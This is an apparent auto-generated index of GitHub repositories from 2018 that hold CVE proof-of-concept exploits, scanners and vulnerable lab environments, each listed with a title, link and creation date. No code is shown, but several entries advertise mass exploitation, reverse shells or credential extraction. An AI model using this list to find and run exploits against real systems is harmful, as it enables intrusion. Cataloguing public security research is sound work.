**OpenBsd_CVE-2018-14665** : [jas502n/CVE-2018-14665](https://github.com/jas502n/CVE-2018-14665) create time: 2018-10-27T10:12:05Z

**no description** : [ensimag-security/CVE-2018-10933](https://github.com/ensimag-security/CVE-2018-10933) create time: 2018-10-25T06:32:06Z

**Weblogic-CVE-2018-3252** : [jas502n/CVE-2018-3252](https://github.com/jas502n/CVE-2018-3252) create time: 2018-10-25T02:16:49Z

**CVE-2018-3245** : [jas502n/CVE-2018-3245](https://github.com/jas502n/CVE-2018-3245) create time: 2018-10-25T01:46:56Z

**OpenSSH 7.7 - Username Enumeration** : [r3dxpl0it/CVE-2018-15473](https://github.com/r3dxpl0it/CVE-2018-15473) create time: 2018-10-24T21:48:07Z

**A weaponized version of CVE-2018-9206** : [Stahlz/JQShell](https://github.com/Stahlz/JQShell) create time: 2018-10-24T20:24:20Z

**no description** : [throwawayaccount12312312/precompiled-CVE-2018-10933](https://github.com/throwawayaccount12312312/precompiled-CVE-2018-10933) create time: 2018-10-24T15:02:51Z

**A libssh CVE-2018-10933 scanner written in rust** : [ivanacostarubio/libssh-scanner](https://github.com/ivanacostarubio/libssh-scanner) create time: 2018-10-24T12:52:09Z

**no description** : [mackleadmire/CVE-2018-3191-Rce-Exploit](https://github.com/mackleadmire/CVE-2018-3191-Rce-Exploit) create time: 2018-10-24T09:54:00Z

**TALOS-2018-0684/cve-2018-4013 poc** : [DoubleMice/cve-2018-4013](https://github.com/DoubleMice/cve-2018-4013) create time: 2018-10-24T08:19:25Z

**CVE-2018-3245-PoC** : [pyn3rd/CVE-2018-3245](https://github.com/pyn3rd/CVE-2018-3245) create time: 2018-10-24T06:49:33Z

**Weblogic-CVE-2018-3191远程代码命令执行漏洞** : [jas502n/CVE-2018-3191](https://github.com/jas502n/CVE-2018-3191) create time: 2018-10-24T02:26:53Z

**CVE-2018-7600 POC (Drupal RCE)** : [r3dxpl0it/CVE-2018-7600](https://github.com/r3dxpl0it/CVE-2018-7600) create time: 2018-10-23T21:47:59Z

**CVE-2018-10933 POC (LIBSSH)** : [r3dxpl0it/CVE-2018-10933](https://github.com/r3dxpl0it/CVE-2018-10933) create time: 2018-10-23T21:17:52Z

**CVE-2018-10933** : [Bifrozt/CVE-2018-10933](https://github.com/Bifrozt/CVE-2018-10933) create time: 2018-10-23T20:11:35Z

**CVE-2018-3191 反弹shell** : [Libraggbond/CVE-2018-3191](https://github.com/Libraggbond/CVE-2018-3191) create time: 2018-10-23T17:24:43Z

**no description** : [j0lama/CVE-2017-11882](https://github.com/j0lama/CVE-2017-11882) create time: 2018-10-23T07:44:39Z

**CVE-2018-3191-PoC** : [pyn3rd/CVE-2018-3191](https://github.com/pyn3rd/CVE-2018-3191) create time: 2018-10-23T02:43:39Z

**A Python PoC for CVE-2018-9206** : [Den1al/CVE-2018-9206](https://github.com/Den1al/CVE-2018-9206) create time: 2018-10-22T16:33:22Z

**CVE-2018-3191 payload generator** : [arongmh/CVE-2018-3191](https://github.com/arongmh/CVE-2018-3191) create time: 2018-10-22T02:29:12Z

**a python script to exploit libssh authentication vulnerability** : [xFreed0m/CVE-2018-10933](https://github.com/xFreed0m/CVE-2018-10933) create time: 2018-10-21T20:41:40Z

**1-day** : [shpik-kr/CVE-2018-17456](https://github.com/shpik-kr/CVE-2018-17456) create time: 2018-10-21T17:46:10Z

**Drupal File Upload Exploit** : [SecPentester/CVE-7600-2018](https://github.com/SecPentester/CVE-7600-2018) create time: 2018-10-21T13:48:13Z

**CVE-2018-10933** : [shifa123/pythonprojects-CVE-2018-10933](https://github.com/shifa123/pythonprojects-CVE-2018-10933) create time: 2018-10-21T05:01:12Z

**LibSSH Authentication Bypass Exploit using RCE** : [Virgula0/POC-CVE-2018-10933](https://github.com/Virgula0/POC-CVE-2018-10933) create time: 2018-10-20T15:34:26Z

**no description** : [pghook/CVE-2018-10933_Scanner](https://github.com/pghook/CVE-2018-10933_Scanner) create time: 2018-10-20T06:53:59Z

**Variant of hackerhouse-opensource/cve-2018-10933** : [ninp0/cve-2018-10933_poc](https://github.com/ninp0/cve-2018-10933_poc) create time: 2018-10-20T00:53:24Z

**libssh CVE-2018-10933** : [jas502n/CVE-2018-10933](https://github.com/jas502n/CVE-2018-10933) create time: 2018-10-20T00:24:04Z

**EPoD (Ethereum Packet of Death)** : [k3v142/CVE-2018-12018](https://github.com/k3v142/CVE-2018-12018) create time: 2018-10-19T11:11:01Z

**TP-Link TL-WR1043ND - Authenticated Remote Code Execution** : [hdbreaker/CVE-2018-16119](https://github.com/hdbreaker/CVE-2018-16119) create time: 2018-10-19T08:50:52Z

**no description** : [cve-2018/cve-2018-10933](https://github.com/cve-2018/cve-2018-10933) create time: 2018-10-18T20:11:22Z

**cve-2018-10933 libssh authentication bypass** : [hackerhouse-opensource/cve-2018-10933](https://github.com/hackerhouse-opensource/cve-2018-10933) create time: 2018-10-18T19:13:45Z

**playSMS < = 1.4.2 - Privilege escalation** : [TheeBlind/CVE-2018-18387](https://github.com/TheeBlind/CVE-2018-18387) create time: 2018-10-18T17:40:42Z

**PoC Code for CVE-2018-18026 (exploit by stack overflow)** : [DownWithUp/CVE-2018-18026](https://github.com/DownWithUp/CVE-2018-18026) create time: 2018-10-18T16:51:26Z

**Hunt for and Exploit the libSSH Authentication Bypass (CVE-2018-10933)** : [marco-lancini/hunt-for-cve-2018-10933](https://github.com/marco-lancini/hunt-for-cve-2018-10933) create time: 2018-10-18T15:08:25Z

**Exploit adapted for a specific PoC on Ubuntu 16.04.01** : [gugronnier/CVE-2017-16995](https://github.com/gugronnier/CVE-2017-16995) create time: 2018-10-18T10:34:24Z

**Scripts to analyze conflicker worm which exploits famous netapi vulnerability (CVE-2008-4250) i.e MS08-067** : [thunderstrike9090/Conflicker_analysis_scripts](https://github.com/thunderstrike9090/Conflicker_analysis_scripts) create time: 2018-10-18T09:38:46Z

**no description** : [likescam/CVE-2018-10933-libSSH-Authentication-Bypass](https://github.com/likescam/CVE-2018-10933-libSSH-Authentication-Bypass) create time: 2018-10-18T09:27:08Z

**Multi-threaded, reliable scanner for CVE-2018-10933.** : [trbpnd/bpnd-libssh](https://github.com/trbpnd/bpnd-libssh) create time: 2018-10-18T04:11:33Z

**no description** : [likescam/CVE-2018-10933_ssh](https://github.com/likescam/CVE-2018-10933_ssh) create time: 2018-10-18T04:10:25Z

**Script to identify hosts vulnerable to CVE-2018-10933** : [leapsecurity/libssh-scanner](https://github.com/leapsecurity/libssh-scanner) create time: 2018-10-17T23:05:10Z

**Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)** : [mogwailabs/CVE-2017-1000486](https://github.com/mogwailabs/CVE-2017-1000486) create time: 2018-10-17T22:47:30Z

**Leveraging it is a simple matter of presenting the server with the SSH2_MSG_USERAUTH_SUCCESS message, which shows that the login already occurred without a problem. The server expects the message SSH2_MSG_USERAUTH_REQUEST to start the authentication procedure, but by skipping it an attacker can log in without showing any credentials.** : [kn6869610/CVE-2018-10933](https://github.com/kn6869610/CVE-2018-10933) create time: 2018-10-17T18:44:05Z

**CVE-2018-10933 sshlib user authentication attack - docker lab, test and exploit** : [hook-s3c/CVE-2018-10933](https://github.com/hook-s3c/CVE-2018-10933) create time: 2018-10-17T15:09:41Z

**Spawn to shell without any credentials by using CVE-2018-10933 (LibSSH)** : [blacknbunny/CVE-2018-10933](https://github.com/blacknbunny/CVE-2018-10933) create time: 2018-10-17T14:14:12Z

**CVE-2018-10933 very simple POC** : [SoledaD208/CVE-2018-10933](https://github.com/SoledaD208/CVE-2018-10933) create time: 2018-10-17T09:01:44Z

**Metasploit module for CVE-2018-4878** : [B0fH/CVE-2018-4878](https://github.com/B0fH/CVE-2018-4878) create time: 2018-10-17T02:11:24Z

**PowerDNS CVE-2017-15120 / DO NOT ABUSE** : [shutingrz/CVE-2017-15120_PoC](https://github.com/shutingrz/CVE-2017-15120_PoC) create time: 2018-10-16T15:08:15Z

**Source code for CVE-2017-16245 (Avecto Defendpoint bypass originally disclosed by Nettitude)** : [AOCorsaire/CVE-2017-16245](https://github.com/AOCorsaire/CVE-2017-16245) create time: 2018-10-16T08:14:29Z

**PoC + Docker Environment for Python PIL/Pillow Remote Shell Command Execution via Ghostscript CVE-2018-16509** : [farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509) create time: 2018-10-15T07:44:43Z

**Automated version of CVE-2018-14847 (MikroTik Exploit)** : [syrex1013/MikroRoot](https://github.com/syrex1013/MikroRoot) create time: 2018-10-13T19:17:42Z

**Simple poc of CVE-2018-8495 Microsoft Edge Remote Code Execution** : [whereisr0da/CVE-2018-8495-POC](https://github.com/whereisr0da/CVE-2018-8495-POC) create time: 2018-10-12T16:49:57Z

**no description** : [quinn-samuel-perry/CVE-2010-4669](https://github.com/quinn-samuel-perry/CVE-2010-4669) create time: 2018-10-11T07:09:49Z

**Ban all denial-of-service vulnerability exploitable nodes from your node CVE-2018-17144** : [iioch/ban-exploitable-bitcoin-nodes](https://github.com/iioch/ban-exploitable-bitcoin-nodes) create time: 2018-10-10T19:44:09Z

**GIT_CVE_2018_17456** : [back2zero/GIT_CVE_2018_17456](https://github.com/back2zero/GIT_CVE_2018_17456) create time: 2018-10-09T02:52:03Z

**OpenSSH < 7.7 User Enumeration CVE-2018-15473 Exploit** : [pyperanger/CVE-2018-15473_exploit](https://github.com/pyperanger/CVE-2018-15473_exploit) create time: 2018-10-08T20:59:04Z

**proof-of-concept (PoC) for linux dists based on Debian, CentOS and RedHat - exploit 1** : [luan0ap/cve-2018-14634](https://github.com/luan0ap/cve-2018-14634) create time: 2018-10-08T18:12:03Z

**Weblogic,CVE-2018-2894** : [jas502n/CVE-2018-2894](https://github.com/jas502n/CVE-2018-2894) create time: 2018-10-07T10:07:41Z

**CVE-2018-2893** : [jas502n/CVE-2018-2893](https://github.com/jas502n/CVE-2018-2893) create time: 2018-10-07T08:41:14Z

**no description** : [evgind/scada_cve2018-16670](https://github.com/evgind/scada_cve2018-16670) create time: 2018-10-06T22:10:36Z

**Metasploit module for CVE-2016-1555** : [ide0x90/cve-2016-1555](https://github.com/ide0x90/cve-2016-1555) create time: 2018-10-06T03:52:23Z

**no description** : [webr0ck/poc-cve-2018-1273](https://github.com/webr0ck/poc-cve-2018-1273) create time: 2018-10-05T14:42:07Z

**An exploitation tool to extract passwords using CVE-2015-5995.** : [shaheemirza/TendaSpill](https://github.com/shaheemirza/TendaSpill) create time: 2018-10-04T18:20:47Z

**Multi-threaded, IPv6 aware, wordlists/single-user username enumeration via CVE-2018-15473** : [epi052/cve-2018-15473](https://github.com/epi052/cve-2018-15473) create time: 2018-10-03T10:18:04Z

**Commvault-CVE-2017-18044** : [securifera/CVE-2017-18044-Exploit](https://github.com/securifera/CVE-2017-18044-Exploit) create time: 2018-10-02T19:18:31Z

**no description** : [lexfo/cve-2017-11176](https://github.com/lexfo/cve-2017-11176) create time: 2018-10-02T08:06:04Z

**MASS Exploiter** : [shellord/CVE-2018-7600-Drupal-RCE](https://github.com/shellord/CVE-2018-7600-Drupal-RCE) create time: 2018-10-02T04:25:02Z

**no description** : [likescam/vmacache_CVE-2018-17182](https://github.com/likescam/vmacache_CVE-2018-17182) create time: 2018-10-01T03:29:04Z

**no description** : [likescam/CVE-2018-17182](https://github.com/likescam/CVE-2018-17182) create time: 2018-10-01T03:20:05Z

**Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day** : [jas502n/CVE-2018-17182](https://github.com/jas502n/CVE-2018-17182) create time: 2018-09-29T15:58:55Z

**no description** : [CytQ/CVE-2014-7911_poc](https://github.com/CytQ/CVE-2014-7911_poc) create time: 2018-09-28T07:45:19Z

**no description** : [beverlymiller818/cve-2018-9075](https://github.com/beverlymiller818/cve-2018-9075) create time: 2018-09-27T17:58:00Z

**Gain root privilege by exploiting CVE-2014-3153 vulnerability** : [dangtunguyen/TowelRoot](https://github.com/dangtunguyen/TowelRoot) create time: 2018-09-27T03:16:15Z

**Make CVE-2007-4607 exploitable again!** : [joeyrideout/CVE-2007-4607](https://github.com/joeyrideout/CVE-2007-4607) create time: 2018-09-27T02:22:45Z

**no description** : [nixwizard/CVE-2018-15365](https://github.com/nixwizard/CVE-2018-15365) create time: 2018-09-26T18:56:41Z

**no description** : [cscli/CVE-2017-5223](https://github.com/cscli/CVE-2017-5223) create time: 2018-09-26T11:58:32Z

**no description** : [bkhablenko/CVE-2017-8046](https://github.com/bkhablenko/CVE-2017-8046) create time: 2018-09-26T11:11:40Z

**no description** : [Voraka/cve-2017-8760](https://github.com/Voraka/cve-2017-8760) create time: 2018-09-25T03:23:13Z

**DVR-Exploiter a Bash Script Program Exploit The DVR's Based on CVE-2018-9995** : [Cyb0r9/DVR-Exploiter](https://github.com/Cyb0r9/DVR-Exploiter) create time: 2018-09-23T20:58:40Z

**no description** : [kenprice/cve-2018-6574](https://github.com/kenprice/cve-2018-6574) create time: 2018-09-23T20:00:38Z

**PoC Code for CVE-2018-16712 (exploit by MmMapIoSpace)** : [DownWithUp/CVE-2018-16712](https://github.com/DownWithUp/CVE-2018-16712) create time: 2018-09-23T16:03:06Z

**no description** : [MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit](https://github.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit) create time: 2018-09-22T19:18:47Z

**CVE-2018-17081** : [himanshurahi/e107_2.1.9_CSRF_POC](https://github.com/himanshurahi/e107_2.1.9_CSRF_POC) create time: 2018-09-22T09:39:26Z

**no description** : [GitHubAssessments/CVE_Assessment_05_2018](https://github.com/GitHubAssessments/CVE_Assessment_05_2018) create time: 2018-09-21T22:54:29Z

**no description** : [lawrenceamer/CVE-2018-7935](https://github.com/lawrenceamer/CVE-2018-7935) create time: 2018-09-21T11:17:59Z

**monstra_cms-3.0.4-上传getshell CVE-2018-17418** : [AlwaysHereFight/monstra_cms-3.0.4--getshell](https://github.com/AlwaysHereFight/monstra_cms-3.0.4--getshell) create time: 2018-09-19T08:54:45Z

**PoC code for CVE-2018-16711 (exploit by wrmsr)** : [DownWithUp/CVE-2018-16711](https://github.com/DownWithUp/CVE-2018-16711) create time: 2018-09-18T22:18:32Z

**Exploit SLmail Buffer Overflow CVE-2003-0264** : [fyoderxx/slmail-exploit](https://github.com/fyoderxx/slmail-exploit) create time: 2018-09-16T18:27:16Z

**Python CVE-2018-1000802 Proof-of-Concept** : [tna0y/CVE-2018-1000802-PoC](https://github.com/tna0y/CVE-2018-1000802-PoC) create time: 2018-09-14T16:22:12Z

**PoC code for CVE-2018-16713 (exploit by rdmsr)** : [DownWithUp/CVE-2018-16713](https://github.com/DownWithUp/CVE-2018-16713) create time: 2018-09-14T14:10:22Z

**CVE-2018-4330 POC for iOS** : [omerporze/toothfairy](https://github.com/omerporze/toothfairy) create time: 2018-09-13T16:05:20Z

**Details about CVE-2018-16987 - Cleartext storage of TA servers' passwords in Squash TM** : [gquere/CVE-2018-16987](https://github.com/gquere/CVE-2018-16987) create time: 2018-09-13T15:32:48Z

**porting CVE-2016-7255 to x86 for educational purposes.** : [bbolmin/cve-2016-7255_x86_x64](https://github.com/bbolmin/cve-2016-7255_x86_x64) create time: 2018-09-13T12:47:29Z

**Java反序列化漏洞利用工具V1.0 Java反序列化相关漏洞的检查工具,采用JDK 1.8+NetBeans8.2开发,软件运行必须安装JDK 1.8或者以上版本。 支持:weblogic xml反序列化漏洞 CVE-2017-10271/CNVD-C-2019-48814/CVE-2019-2725检查。** : [shack2/javaserializetools](https://github.com/shack2/javaserializetools) create time: 2018-09-13T09:44:18Z

**Details about CVE-2017-6913 - Stored XSS in open-xchange's webmail** : [gquere/CVE-2017-6913](https://github.com/gquere/CVE-2017-6913) create time: 2018-09-13T05:51:59Z

**no description** : [harryanon/POC-CVE-2018-4327-and-CVE-2018-4330](https://github.com/harryanon/POC-CVE-2018-4327-and-CVE-2018-4330) create time: 2018-09-12T22:00:58Z

**veloCloud VMWare - Vulnerability** : [bokanrb/CVE-2018-6961](https://github.com/bokanrb/CVE-2018-6961) create time: 2018-09-12T19:44:15Z

**no description** : [idkwim/CVE-2018-8420](https://github.com/idkwim/CVE-2018-8420) create time: 2018-09-12T08:22:54Z

**CVE-2018-15832** : [JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0](https://github.com/JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0) create time: 2018-09-12T04:59:11Z

**C# implementation of BasuCert/WinboxPoC [Winbox Critical Vulnerability (CVE-2018-14847)]** : [msterusky/WinboxExploit](https://github.com/msterusky/WinboxExploit) create time: 2018-09-11T19:36:49Z

**POC for CVE-2018-4327** : [omerporze/brokentooth](https://github.com/omerporze/brokentooth) create time: 2018-09-11T19:15:09Z

**GitStackRCE漏洞(CVE-2018-5955)EXP** : [cisp/GitStackRCE](https://github.com/cisp/GitStackRCE) create time: 2018-09-11T04:39:43Z

**RCE exploit for CVE-2018-14772** : [spencerdodd/CVE-2018-14772](https://github.com/spencerdodd/CVE-2018-14772) create time: 2018-09-11T01:24:21Z

**Simple poc of CVE-2018-8353 Microsoft Scripting Engine Use After Free** : [whereisr0da/CVE-2018-8353-POC](https://github.com/whereisr0da/CVE-2018-8353-POC) create time: 2018-09-10T17:28:05Z

**no description** : [GitHubAssessments/CVE_Assessment_04_2018](https://github.com/GitHubAssessments/CVE_Assessment_04_2018) create time: 2018-09-09T17:36:02Z

**no description** : [jezzus/CVE-2018-4121](https://github.com/jezzus/CVE-2018-4121) create time: 2018-09-06T23:55:43Z

**no description** : [jezzus/CVE-2018-11776-Python-PoC](https://github.com/jezzus/CVE-2018-11776-Python-PoC) create time: 2018-09-06T23:49:20Z

**no description** : [likescam/CVE-2018-8174-msf](https://github.com/likescam/CVE-2018-8174-msf) create time: 2018-09-06T04:03:25Z

**Frog CMS 0.9.5 has an Upload > vulnerability that can create files via > /admin/?/plugin/file_manager/save** : [snappyJack/CVE-2018-16373](https://github.com/snappyJack/CVE-2018-16373) create time: 2018-09-06T02:00:24Z

**In PESCMS Team 2.2.1, attackers may upload and execute arbitrary PHP code through /Public/?g=Team&m=Setting&a=upgrade by placing a .php file in a ZIP archive.** : [snappyJack/CVE-2018-16370](https://github.com/snappyJack/CVE-2018-16370) create time: 2018-09-06T01:52:47Z

**Zimbra Collaboration Suite Username Enumeration** : [0x00-0x00/CVE-2018-15131](https://github.com/0x00-0x00/CVE-2018-15131) create time: 2018-09-05T14:11:16Z

**Zimbra Collaboration Suite Username Enumeration** : [0x00-0x00/CVE-2018-10949](https://github.com/0x00-0x00/CVE-2018-10949) create time: 2018-09-05T14:09:13Z

**no description** : [GitHubAssessments/CVE_Assessment_03_2018](https://github.com/GitHubAssessments/CVE_Assessment_03_2018) create time: 2018-09-05T01:25:08Z

**Apache Struts version analyzer (Ansible) based on CVE-2017-5638** : [andypitcher/check_struts](https://github.com/andypitcher/check_struts) create time: 2018-09-04T18:19:26Z

**A remote code execution exploit for WebLogic based on CVE-2018-2628** : [Nervous/WebLogic-RCE-exploit](https://github.com/Nervous/WebLogic-RCE-exploit) create time: 2018-09-04T12:17:21Z

**POC** : [yield-c/CVE2015-7576](https://github.com/yield-c/CVE2015-7576) create time: 2018-09-04T09:19:41Z

**CVE-2017-10366: Oracle PeopleSoft 8.54, 8.55, 8.56 Java deserialization exploit** : [blazeinfosec/CVE-2017-10366_peoplesoft](https://github.com/blazeinfosec/CVE-2017-10366_peoplesoft) create time: 2018-09-03T15:46:39Z

**Primefaces <= 5.2.21, 5.3.8 or 6.0 - Remote Code Execution Exploit** : [pimps/CVE-2017-1000486](https://github.com/pimps/CVE-2017-1000486) create time: 2018-09-03T03:11:24Z

**1day Exploit by sheisback** : [Sheisback/CVE-2017-11783](https://github.com/Sheisback/CVE-2017-11783) create time: 2018-08-31T01:48:29Z

**Mitigate CVE-2018-6389 WordPress load-scripts / load-styles attacks** : [ItinerisLtd/trellis-cve-2018-6389](https://github.com/ItinerisLtd/trellis-cve-2018-6389) create time: 2018-08-30T01:25:20Z

**This tool takes advantage of CVE-2018-11776 and Shodan to perform mass exploitation of verified and vulnerable Apache Struts servers.** : [649/Apache-Struts-Shodan-Exploit](https://github.com/649/Apache-Struts-Shodan-Exploit) create time: 2018-08-29T19:50:26Z

**a small utility to generate a cookie in order to exploit a grafana vulnerability (CVE-2018-15727)** : [u238/grafana-CVE-2018-15727](https://github.com/u238/grafana-CVE-2018-15727) create time: 2018-08-29T16:35:22Z

**A simple exploit for Apache Struts RCE S2-057 (CVE-2018-11776)** : [brianwrf/S2-057-CVE-2018-11776](https://github.com/brianwrf/S2-057-CVE-2018-11776) create time: 2018-08-28T23:48:14Z

**no description** : [coderobe/CVE-2018-15912-PoC](https://github.com/coderobe/CVE-2018-15912-PoC) create time: 2018-08-28T17:40:52Z

**no description** : [renorobert/virtualbox-cve-2018-2844](https://github.com/renorobert/virtualbox-cve-2018-2844) create time: 2018-08-28T08:04:19Z

**Tiny script to enumerate users using CVE-2017-9554 (forget_passwd.cgi)** : [rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-](https://github.com/rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-) create time: 2018-08-28T05:13:59Z

**no description** : [tuxotron/cve-2018-11776-docker](https://github.com/tuxotron/cve-2018-11776-docker) create time: 2018-08-28T01:14:52Z

**Proof of Concept for CVE-2018-11776** : [Ekultek/Strutter](https://github.com/Ekultek/Strutter) create time: 2018-08-27T17:22:16Z

**Discuz backend getshell** : [FoolMitAh/CVE-2018-14729](https://github.com/FoolMitAh/CVE-2018-14729) create time: 2018-08-27T11:58:49Z

**CVE-2018-6643** : [undefinedmode/CVE-2018-6643](https://github.com/undefinedmode/CVE-2018-6643) create time: 2018-08-26T16:03:08Z

**A full exploit of CVE-2017-3000 on Flash Player Constant Blinding PRNG** : [dangokyo/CVE-2017-3000](https://github.com/dangokyo/CVE-2017-3000) create time: 2018-08-26T14:34:44Z

**Environment for CVE-2018-11776 / S2-057 (Apache Struts 2)** : [knqyf263/CVE-2018-11776](https://github.com/knqyf263/CVE-2018-11776) create time: 2018-08-25T12:45:15Z

**no description** : [moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636) create time: 2018-08-25T11:50:22Z

**no description** : [GitHubAssessments/CVE_Assessment_02_2018](https://github.com/GitHubAssessments/CVE_Assessment_02_2018) create time: 2018-08-25T06:10:06Z

**Vulnerable docker container for CVE-2018-11776** : [bhdresh/CVE-2018-11776](https://github.com/bhdresh/CVE-2018-11776) create time: 2018-08-25T03:06:30Z

**An exploit for Apache Struts CVE-2018-11776** : [mazen160/struts-pwn_CVE-2018-11776](https://github.com/mazen160/struts-pwn_CVE-2018-11776) create time: 2018-08-25T01:53:30Z

**Simple poc of CVE-2018-8414 Windows Package Setting RCE Vulnerability** : [whereisr0da/CVE-2018-8414-POC](https://github.com/whereisr0da/CVE-2018-8414-POC) create time: 2018-08-24T18:09:29Z

**Working Python test and PoC for CVE-2018-11776, includes Docker lab** : [hook-s3c/CVE-2018-11776-Python-PoC](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC) create time: 2018-08-24T11:53:02Z

**CVE-2018-11776(S2-057) EXPLOIT CODE** : [jiguangin/CVE-2018-11776](https://github.com/jiguangin/CVE-2018-11776) create time: 2018-08-24T03:01:29Z

**Creating a vulnerable environment and the PoC** : [xfox64x/CVE-2018-11776](https://github.com/xfox64x/CVE-2018-11776) create time: 2018-08-23T20:06:17Z

**Docker image for a vulnerable struts app** : [trbpnd/CVE-2018-11776](https://github.com/trbpnd/CVE-2018-11776) create time: 2018-08-23T19:25:26Z

**PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service** : [atredispartners/CVE-2018-0952-SystemCollector](https://github.com/atredispartners/CVE-2018-0952-SystemCollector) create time: 2018-08-21T20:29:10Z

**PoC code for CVE-2018-15499 (exploit race condition for BSoD)** : [DownWithUp/CVE-2018-15499](https://github.com/DownWithUp/CVE-2018-15499) create time: 2018-08-21T15:26:35Z

**no description** : [dangokyo/CVE-2015-5119](https://github.com/dangokyo/CVE-2015-5119) create time: 2018-08-21T12:31:49Z

**a exp for cve-2018-9948/9958 , current shellcode called win-calc** : [orangepirate/cve-2018-9948-9958-exp](https://github.com/orangepirate/cve-2018-9948-9958-exp) create time: 2018-08-21T07:43:38Z

**Exploit written in Python for CVE-2018-15473 with threading and export formats** : [Rhynorater/CVE-2018-15473-Exploit](https://github.com/Rhynorater/CVE-2018-15473-Exploit) create time: 2018-08-21T00:09:56Z

**CVE-2018-15473 - Opensshenum is an user enumerator exploiting an OpenSsh bug** : [gbonacini/opensshenum](https://github.com/gbonacini/opensshenum) create time: 2018-08-19T11:23:54Z

**Microsoft Visual Studio CVE-2018-8172 Remote Code Execution Vulnerability** : [SyFi/CVE-2018-8172](https://github.com/SyFi/CVE-2018-8172) create time: 2018-08-18T03:37:15Z

**OpenSSH 2.3 up to 7.4 Mass Username Enumeration (CVE-2018-15473).** : [trimstray/massh-enum](https://github.com/trimstray/massh-enum) create time: 2018-08-17T23:48:15Z

**CVE-2018-8120 Windows LPE exploit** : [ozkanbilge/CVE-2018-8120](https://github.com/ozkanbilge/CVE-2018-8120) create time: 2018-08-16T10:51:00Z

**no description** : [sischkg/cve-2018-5740](https://github.com/sischkg/cve-2018-5740) create time: 2018-08-15T01:50:41Z

**PoC for CVE-2018-15133 (Laravel unserialize vulnerability)** : [kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133) create time: 2018-08-14T18:51:50Z

**no description** : [kaisaryousuf/CVE-2018-8208](https://github.com/kaisaryousuf/CVE-2018-8208) create time: 2018-08-13T06:56:11Z

**Implements the POP/MOV SS (CVE-2018-8897) vulnerability by leveraging SYSCALL to perform a local privilege escalation (LPE).** : [nmulasmajic/syscall_exploit_CVE-2018-8897](https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897) create time: 2018-08-08T20:04:56Z

**Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018** : [saelo/cve-2018-4233](https://github.com/saelo/cve-2018-4233) create time: 2018-08-08T14:41:20Z

**Easy script to check if drupal 8.x-8.5.6 is vulnerable to CVE-2018-14.773** : [lckJack/legacySymfony](https://github.com/lckJack/legacySymfony) create time: 2018-08-08T12:42:56Z

**no description** : [mikerissi/CVE-2018](https://github.com/mikerissi/CVE-2018) create time: 2018-08-04T22:37:10Z

**Foxit Reader version 9.0.1.1049 Use After Free with ASLR and DEP bypass on heap** : [manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958](https://github.com/manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958) create time: 2018-08-04T02:32:28Z

**CVE-2007-2447 - Samba usermap script** : [amriunix/CVE-2007-2447](https://github.com/amriunix/CVE-2007-2447) create time: 2018-08-03T18:39:56Z

**A Burp extension to detect and exploit versions of Telerik Web UI vulnerable to CVE-2017-9248.** : [capt-meelo/Telewreck](https://github.com/capt-meelo/Telewreck) create time: 2018-08-03T04:36:23Z

**Apache Range Header DoS Exploit** : [limkokhole/CVE-2011-3192](https://github.com/limkokhole/CVE-2011-3192) create time: 2018-08-02T11:30:35Z

**MS15-034: HTTP.sys (IIS) DoS** : [limkokhole/CVE-2015-1635](https://github.com/limkokhole/CVE-2015-1635) create time: 2018-08-02T11:28:14Z

**no description** : [GitHubAssessments/CVE_Assessment_01_2018](https://github.com/GitHubAssessments/CVE_Assessment_01_2018) create time: 2018-08-02T03:28:21Z

**Crestron AirMedia AM-100 Traversal and Hashdump Metasploit Modules** : [xfox64x/CVE-2016-5639](https://github.com/xfox64x/CVE-2016-5639) create time: 2018-08-01T14:59:09Z

**Crestron AirMedia AM-100 RCE (CVE-2016-5640) Metasploit Module** : [xfox64x/CVE-2016-5640](https://github.com/xfox64x/CVE-2016-5640) create time: 2018-08-01T14:52:33Z

**CVE-2018-11235 (Git)** : [knqyf263/CVE-2018-11235](https://github.com/knqyf263/CVE-2018-11235) create time: 2018-08-01T11:52:54Z

**PoC Exploit for AOSP UserDictionary Content Provider (CVE-2018-9375)** : [IOActive/AOSP-ExploitUserDictionary](https://github.com/IOActive/AOSP-ExploitUserDictionary) create time: 2018-07-30T14:54:34Z

**on Mac 10.12.2** : [Peterpan0927/CVE-2017-2370](https://github.com/Peterpan0927/CVE-2017-2370) create time: 2018-07-30T09:32:15Z

**Exploit for Oracle Access Manager padding oracle vulnerability (CVE-2018-2879)** : [AymanElSherif/oracle-oam-authentication-bypas-exploit](https://github.com/AymanElSherif/oracle-oam-authentication-bypas-exploit) create time: 2018-07-29T18:56:25Z

**A demo exploit of CVE-2016-9079 on Ubuntu x64** : [dangokyo/CVE-2016-9079](https://github.com/dangokyo/CVE-2016-9079) create time: 2018-07-29T12:55:27Z

**no description** : [dj-thd/cve2018-11235-exploit](https://github.com/dj-thd/cve2018-11235-exploit) create time: 2018-07-27T22:01:47Z

**no description** : [MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit](https://github.com/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit) create time: 2018-07-26T19:31:45Z

**可以直接反弹shell** : [qianl0ng/CVE-2018-2893](https://github.com/qianl0ng/CVE-2018-2893) create time: 2018-07-26T07:16:38Z

